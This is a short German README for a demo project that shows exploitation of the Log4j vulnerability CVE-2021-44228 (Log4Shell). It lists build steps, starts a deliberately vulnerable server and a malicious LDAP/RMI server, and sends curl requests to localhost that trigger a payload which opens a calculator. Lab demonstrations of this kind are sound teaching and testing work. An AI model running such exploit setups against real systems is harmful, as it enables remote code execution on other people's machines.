
Demo-Projekt zur Veranschaulichung der Ausnutzung der Log4j-Schwachstelle (CVE-2021-44228)
Demo-Projekte, um zu zeigen, wie man die log4j (CVE-2021-44228) Schwachstelle ausnutzt
Verwendet Spring Boot, um schnell einsatzbereit zu sein. Bitte entschuldige das ganze Hardcoding, es war nur ein POC.
Java 8 muss installiert sein. Baue mit Maven mvn clean package -DskipTests. Führe diese Befehle in separaten Shell-Fenstern aus:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Dies sollte den Code in der Exploit-Klasse ausführen (welche einfach den Taschenrechner öffnet)